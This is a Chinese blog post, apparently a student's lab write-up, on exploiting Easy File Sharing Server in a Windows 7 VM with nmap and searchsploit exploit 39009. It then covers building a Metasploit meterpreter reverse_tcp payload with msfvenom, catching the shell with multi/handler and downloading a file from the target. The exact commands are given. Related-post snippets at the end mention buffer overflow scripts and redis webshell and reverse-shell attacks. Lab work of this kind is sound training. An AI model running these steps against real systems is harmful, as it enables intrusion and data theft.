复现任务A

已于 2022-11-06 19:31:22 修改
阅读量308 收藏
点赞数 1
分类专栏: 笔记 文章标签: windows 网络 学习
于 2022-11-06 14:41:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62270288/article/details/127715083
版权

一、漏洞渗透测试

1、靶机(Windows)安装easy file sharing server(efssetup_2018.zip),该服务存在漏洞。

2、利用Nmap扫描发现靶机(Windows)运行了该服务。P99-100

3、利用该漏洞,使得靶机运行计算器。P116-119

在VM上打开靶机windows7和kali,在win7安装好easy file sharing 并打开。

kali上输入ifconfig查看kali的ip 为192.168.10.129

输入sudo su进入root模式使用nmap 192.168.10.129/24扫描同一子网下的主机

扫描发现 靶机ip:192.168.10.128

输入命令 nmap -sV -o easy-file.txt 192.168.10.128将扫描靶机上服务的版本记录在easy-file.txt文件里。

可以知道靶机正在运行该服务

随后使用命令searchsploit easy file sharing 

该命令可以搜索到标题和路径中包含“easy file sharing”的所有内容

选用39009的脚本searchsploit -m 39009

输入命令 python2  (+上图path) 192.168.10.128(靶机ip) 8000(easy file sharing的端口)

Done表示完成 回到win7 发现计算器已打开。

二、Metasploit应用

1、生成主控端、被控端。

2、获得靶机(Windows)控制权。

3、下载靶机上任意一个文件。

在kali输入命令msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.10.129 lport=5000 -f exe -o /var/payload.exe

在var目录下生成payload.exe文件并复制到靶机上

随后输入命令msfconsole启动meterpreter

在启动成功后按序输入

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.10.129

set lport 5000

回到靶机运行之前复制到靶机上的payload.exe文件

再输入命令Exploit

连接成功

使用命令ls 查看当前目录下的文件

输入download haha.txt(要下载的文件名) C:\Users\Administrator\Desktop(文件路径)

下载完成,去保存目录打开文件查看与靶机上内容相同,复现成功。

koo364
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
YoloV8实战:复现基于多任务的YoloV8方案
m0_47867638的博客
05-20 756
自动驾驶中多任务学习,特别是通过设计一种自适应、实时且轻量级的模型来同时处理目标检测、可行驶区域分割和车道线分割,是一种非常有用的研究方法,其中最出名的当属YOLOP模型。然后,YoloP在实时性上并没有得到满足,本文复现基于YoloV8的对任务方案,并在BDD100K数据集上验证和测试,给这方面研究的同学提供便利。BDD100k是一个大规模的自动驾驶数据集,包含了多种复杂的驾驶场景和天气条件。模型在该数据集上取得了具有竞争力的结果,证明了其在实际应用中的有效性。
复现a20210415RAW (2)1
08-08
标题 "复现a20210415RAW (2)1" 暗示了这是一个关于在RAW图像领域复现某个特定研究项目的工作,可能是对2021年4月15日进行的一项实验或研究的再实现。描述中的 "(1)072Due to the lack of large-scale RAW image ...
渗透之——触发Easy File Sharing Web Server 7.2 HEAD缓冲区溢出的Python脚本
冰河的专栏
01-16 8013
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86506264 脚本一: # Exploit Title: Easy File Sharing Web Server 7.2 - HEAD HTTP request SEH Buffer Overflow # Date: 2019-01-16 # Exploit Author...
漏洞渗透测试:easy file sharing server
m0_64005272的博客
11-05 943
扫描对应端口服务的版本信息,发现8000端口的版本信息为easy file sharing server httpd 6.9。因为靶机上有IIS可能占用了80端口,所以在这里设置一下服务部署的端口为8000,点击Restart。用python运行这个脚本,运行成功。转到靶机上,发现软件自动关闭并打开了计算器,漏洞复现完毕。利用该漏洞,在Kali终端输入searchsploit命令,查找渗透模块。靶机:windows(这里我使用的是win7)一路next即可,点击try it!
复现任务A(漏洞渗透测试与Metasploit应用)
qq_61793472的博客
11-20 437
网络渗透测试课,复现任务A
复现任务A—利用efssetup漏洞的简单测试
qq_51690722的博客
11-23 1155
1.首先是我们要安装一个windows虚拟机,用他来当做靶机。 2.如果我们发现无法从本机拖动文件到靶机上,说明
网络渗透测试复现任务
m0_73936732的博客
11-22 700
复现任务
redis漏洞复现
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
03-24 2057
目录 redis准备 启动redis服务器 redis漏洞利用 写入webshell 计划任务反弹shell 写入公钥远程连接 主从复制RCE(Linux) 主从同步RCE漏洞复现 Windows自启动 redis密码暴力破解 由于最近github的问题,已备好 资源包 提取码:ks18 redis准备 Linux 安装: https://redis.io/download tar xzf redis-6.0.1.tar.gz cd redis-6.0.1...
科研论文复现
weixin_46039719的博客
02-08 3302
目录 0 引言 1 在你阅读科学论文之前 1.1 先找找开源资源,避免重复编程 1.2 寻找实现你目标的更简便的途径 1.3 注意软件专利 1.4 学习相关领域的更多论文 1.5 保持学习动力 2 三种论文分类 2.1 开创性论文 2.2 抄袭论文 2.3 垃圾论文 3 如何阅读科学论文 3.1 找到正确的论文 3.2 不要在屏幕上阅读 3.3 良好的时间和地点 3.4 标记和注释 3.5 了解所有术语的定义 3.6 在结论中寻找统计分析 3.7 确保论文结果满足你的需
MotionBERT 源码复现
KangXi_TangYuan的博客
12-05 1581
(本人代码小白,记录一下复现过程,主要是写给自己的以防忘了,并非教程,不喜勿喷)
基于pytorch的DenseFuse复现.zip
11-10
PyTorch还具有强大的GPU加速功能,适用于大规模的计算任务。 **2. DenseFuse算法原理** DenseFuse的核心思想是利用深度学习的方法对多源图像进行逐像素的融合处理。首先,算法通过卷积神经网络(CNN)提取输入图像...
脑机接口运动想象源码复现
02-20
python代码,数据集为BCI IV-2a ,四分类任务网络模型EEG-TCNet 基于tensorflow EEG-TCNet: An Accurate Temporal Convolutional Network for Embedded Motor-Imagery Brain–Machine Interfaces
C++:模拟实现list
2301_80894970的博客
08-31 1276
上篇文章简单介绍了list的接口使用,那么这篇文章将通过模拟实现list以及常用接口来更好的去理解list类,观看本章前将默认读者对链表的数据结构有初步的了解。list在库里是一个带哨兵位的双向循环的链表结构,并且list是一个类模板并不是一个指定的类型,所以在模拟实现时需要写成模板。
刷题记录(2)
qq_47267252的博客
09-02 371
其中值为1的元素具备同化特性,每经过1s,将上下左右值为0的元素同化为1。将数组所有成员随机初始化为0或2,再将矩阵的[0,0]元素修改成1,在经过足够长的时间后,求矩阵中有多少个元素是0或2(即0和2数量之和)输入描述第一行为条目数目,接下来几行是具体的条目,每个条目是一对ID,第一个数字是发送者ID,后面的数字是接收者ID,中间空格隔开,所有的ID都是为无符号整型,ID最大值为100;输出描述:输出该ID是否为垃圾短信发送者,并且按序列输出L M的值(由于N值不唯一,不需要输出)后面的数字是矩阵内容。
JAVA集合的扩容机制
sanzailmn的博客
08-30 700
JAVA集合的扩容机制(ArrayList、LinkedList、Vector、HashMap)
Java中的Stream流
云扬的博客
09-02 930
本文主要介绍了Java中的Stream流,包括流的使用,流的几个重要中间操作,流的几个重要终止操作,使用流进行数据的处理工作。供个人学习使用。
vmware解决虚拟机空间占用不断增大问题
Mr_XiMu的博客
08-30 541
vmware解决虚拟机空间占用不断增大问题
c++修炼之路之C++11
最新发布
Miwll的博客
09-02 1128
c++11相关内容
activity A 跳转 activity B 如何才能复现 activity A 不走onPause
07-14
在这种情况下,Activity A不会走`onPause`方法,因为它所在的任务栈已经不再可见。 2. 使用`finish()`方法立即关闭Activity A:如果在启动Activity B之前立即调用了Activity A的`finish()`方法来关闭它,那么...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值